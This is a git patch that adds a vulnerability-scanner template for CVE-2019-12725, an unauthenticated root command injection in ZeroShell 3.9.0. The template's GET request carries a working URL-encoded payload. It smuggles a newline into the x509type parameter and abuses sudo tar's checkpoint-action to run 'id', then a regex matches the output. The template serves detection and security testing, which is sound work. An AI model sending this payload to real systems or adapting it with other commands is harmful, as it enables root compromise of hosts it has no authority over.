From f9301c58085aab90bfc56f65decd0d5b45335f4e Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <dwi.siswanto98@gmail.com>
Date: Thu, 26 Nov 2020 11:24:02 +0700
Subject: [PATCH] :fire: Add CVE-2019-12725

---
 cves/CVE-2019-12725.yaml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 cves/CVE-2019-12725.yaml

diff --git a/cves/CVE-2019-12725.yaml b/cves/CVE-2019-12725.yaml
new file mode 100644
index 0000000000..00104e94ac
--- /dev/null
+++ b/cves/CVE-2019-12725.yaml
@@ -0,0 +1,27 @@
+id: cve-2019-12725
+
+info:
+  name: Zeroshell 3.9.0 Remote Command Execution
+  author: dwisiswant0
+  severity: critical
+  description: |
+    This template exploits an unauthenticated command injection vulnerability 
+    found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. 
+    As sudo is configured to execute /bin/tar without a password (NOPASSWD)
+    it is possible to run root commands using the "checkpoint" tar options.
+  references:
+    - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
+    - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
\ No newline at end of file